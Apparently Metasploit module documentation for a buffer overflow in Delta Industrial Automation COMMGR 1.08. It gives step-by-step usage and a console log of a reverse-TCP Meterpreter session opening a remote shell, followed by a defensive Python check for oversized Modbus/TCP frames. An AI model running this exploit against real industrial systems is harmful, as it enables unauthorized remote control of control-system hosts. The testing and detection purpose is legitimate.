Vulnerable Application
Delta Electronics Delta Industrial Automation COMMGR 1.08 is affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code. This module has been tested successfully on Windows XP SP3, Windows 7 SP1, and Windows 8.1. The vulnerable application is available for download at http://www.deltaww.com/Products/PluginWebUserControl/downloadCenterCounter.aspx?DID=7763&DocPath=1&hl=en-US.
Verification Steps
- Install Delta Industrial Automation COMMGR 1.08
- Start msfconsole
- Do: use exploit/windows/scada/delta_ia_commgr_bof
- Do: set RHOST <target_ip>
- Do: run
- You should get a shell. :)
Scenarios
Delta Industrial Automation COMMGR 1.08 on Windows 7 SP1
msf > use exploit/windows/scada/delta_ia_commgr_bof
msf exploit(windows/scada/delta_ia_commgr_bof) > show options
Module options (exploit/windows/scada/delta_ia_commgr_bof):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  502              yes       The target port (TCP)
Exploit target:
   Id  Name
   --  ----
   0   COMMGR 1.08 / Windows Universal
msf exploit(windows/scada/delta_ia_commgr_bof) > set RHOST 192.168.3.64
RHOST => 192.168.3.64
msf exploit(windows/scada/delta_ia_commgr_bof) > run
[*] Started reverse TCP handler on 192.168.3.150:4444
[*] 192.168.3.64:502 - Trying target COMMGR 1.08 / Windows Universal, sending 4601 bytes...
[*] Sending stage (179779 bytes) to 192.168.3.64
[*] Meterpreter session 1 opened (192.168.3.150:4444 -> 192.168.3.64:49170) at 2018-09-18 23:38:51 -0700
meterpreter > sysinfo
Computer : TEST01
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > shell
Process 932 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\Delta Industrial Automation\COMMGR 1.08>exit
exit
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.3.64 - Meterpreter session 1 closed. Reason: User exit
msf exploit(windows/scada/delta_ia_commgr_bof) >
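
A detection-side check, added here as an example and not part of the module or its documentation: the run above sends 4601 bytes to TCP port 502, the port registered for Modbus/TCP, where the largest valid frame is 260 bytes. The sketch assumes that legitimate client traffic to this port on the monitored host is Modbus/TCP-framed; `inspect_stream` and the sample names are hypothetical, and both samples are constructed.

```python
import struct

MBAP_LEN = 7            # transaction id, protocol id, length (2 bytes each) + unit id
MAX_ADU = 260           # largest valid Modbus/TCP ADU: 7-byte MBAP + 253-byte PDU
MAX_LENGTH_FIELD = 254  # length field counts unit id + PDU

def inspect_stream(data: bytes) -> list[str]:
    """Walk client-to-server bytes as back-to-back Modbus/TCP ADUs; return findings."""
    findings, offset = [], 0
    while offset < len(data):
        header = data[offset:offset + MBAP_LEN]
        if len(header) < MBAP_LEN:
            findings.append(f"offset {offset}: truncated MBAP header")
            break
        _tid, proto, length, _unit = struct.unpack(">HHHB", header)
        problem = None
        if proto != 0:
            problem = f"protocol id {proto:#06x} is not Modbus (0)"
        elif not 2 <= length <= MAX_LENGTH_FIELD:
            problem = f"length field {length} outside 2..{MAX_LENGTH_FIELD}"
        elif offset + 6 + length > len(data):
            problem = f"ADU declares {length} bytes but the stream ends early"
        if problem:
            findings.append(f"offset {offset}: {problem}")
            rest = len(data) - offset
            if rest > MAX_ADU:
                # More data than any single valid frame could carry
                findings.append(f"offset {offset}: {rest} unparsed bytes exceed "
                                f"the {MAX_ADU}-byte ADU limit")
            break
        offset += 6 + length  # 6 header bytes precede the counted part
    return findings

# Constructed samples: a Read Holding Registers request, and 4601 filler bytes
# matching only the size reported in the console output above.
VALID = struct.pack(">HHHBBHH", 1, 0, 6, 1, 3, 0, 10)
OVERSIZED = b"A" * 4601

if __name__ == "__main__":
    for name, sample in (("valid x2", VALID * 2), ("oversized", OVERSIZED)):
        print(name, inspect_stream(sample) or "clean")
```

Feed it the reassembled client-to-server payload of a connection; a stream that is still arriving will report "ends early" until its last segment is in, so evaluate that finding only on closed or idle connections.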